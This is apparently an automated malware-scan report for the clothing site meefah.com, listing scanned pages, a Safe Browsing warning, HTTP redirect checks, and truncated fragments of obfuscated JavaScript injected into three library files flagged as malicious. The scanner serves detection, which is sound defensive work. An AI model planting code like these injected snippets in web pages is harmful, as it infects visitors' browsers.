Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=meefah.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://meefah.com/ | 200 OK Content-Length: 9790 Content-Type: text/html | clean |
http://meefah.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/javascript | clean |
http://tracker.stats.in.th/tracker.php?uid=18554 | 200 OK Content-Length: 579 Content-Type: text/javascript | suspicious |
Page code contains blacklisted domain: meefah.com var stats_key="3400781915"; var stats_domain='meefah.com'; var stats_uid='18554'; var stats_uname='18554'; var use_ssl = 'https:' == document.location.protocol; if(typeof(parent.document) != 'undefined') { if(typeof(parent.stats_init) == 'undefined') { parent.stats_init = true; document.write("<script src='" + document.location.protocol + "//static.stats.in.th/tracker.js'></script>"); } } else if(typeof(stats_init) == 'undefined') { var stats_init = true; document.write("<script src='" + document.location.protocol + "//static.stats.in.th/tracker.js'></script>"); } | ||
http://meefah.com/index.html | 200 OK Content-Length: 9790 Content-Type: text/html | clean |
http://meefah.com/cloth.php | 200 OK Content-Length: 10140 Content-Type: text/html | clean |
http://meefah.com/poloman.php | 200 OK Content-Length: 14089 Content-Type: text/html | clean |
http://meefah.com/js/prototype.js | 200 OK Content-Length: 48972 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a77', '#727e7b', '#3d727e', '#7c3e7f', '#707674', '#3e7982', '#3d7f77', '#7f314d'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) { Position.cumulativeOffset = function(element) { var valueT = 0, valueL = 0; do { valueT += element.offsetTop || 0; valueL += element.offsetLeft || 0; if (element.offsetParent == document.body) if (Element.getStyle(element, 'position') == 'absolute') break; element = element.offsetParent; } while (element); return [valueL, valueT]; } } Antivirus reports:
| ||
http://meefah.com/js/scriptaculous.js?load=effects | 200 OK Content-Length: 3521 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a77', '#727e7b', '#3d727e', '#7c3e7f', '#707674', '#3e7982', '#3d7f77', '#7f314d'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/)) }).each( function(s) { var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,''); var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); Antivirus reports:
| ||
http://meefah.com/js/lightbox.js | 200 OK Content-Length: 24750 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a77', '#727e7b', '#3d727e', '#7c3e7f', '#707674', '#3e7982', '#3d7f77', '#7f314d'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; } var flashEmbeds = document.getElementsByTagName("embeds"); for (i = 0; i != flashEmbeds.length; i++) { flashEmbeds[i].style.visibility = "hidden"; } } function pause(ms){ var date = new Date(); curDate = null; do{var curDate = new Date();} while( curDate - date < ms); } function initLightbox() { myLightbox = new Lightbox(); } Event.observe(window, 'load', initLightbox, false); Antivirus reports:
| ||
http://meefah.com/polowomen.php | 200 OK Content-Length: 14206 Content-Type: text/html | clean |
http://meefah.com/flowerm.php | 200 OK Content-Length: 19346 Content-Type: text/html | clean |
http://meefah.com/flowerw.php | 200 OK Content-Length: 24082 Content-Type: text/html | clean |
http://meefah.com/v-neck.php | 200 OK Content-Length: 11474 Content-Type: text/html | clean |
http://meefah.com/bag.php | 200 OK Content-Length: 17635 Content-Type: text/html | clean |
http://meefah.com/bag/example/9x11_bag.jpg | 200 OK Content-Length: 24909 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: meefah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 21:35:16 GMT
Accept-Ranges: bytes
ETag: "da520-263e-4d717babcd600"
Server: Apache/2.2.16 (Debian) PHP/5.3.28-1~dotdeb.0 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o
Vary: Accept-Encoding
Content-Length: 9790
Content-Type: text/html
Last-Modified: Mon, 04 Mar 2013 11:33:44 GMT
...9790 bytes of data.
GET / HTTP/1.1
Host: meefah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 21:35:16 GMT
Accept-Ranges: bytes
ETag: "da520-263e-4d717babcd600"
Server: Apache/2.2.16 (Debian) PHP/5.3.28-1~dotdeb.0 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o
Vary: Accept-Encoding
Content-Length: 9790
Content-Type: text/html
Last-Modified: Mon, 04 Mar 2013 11:33:44 GMT
...9790 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: meefah.com
Referer: http://www.google.com/search?q=meefah.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: meefah.com
Referer: http://www.google.com/search?q=meefah.com
Result:
The result is similar to the first query. There are no suspicious redirects found.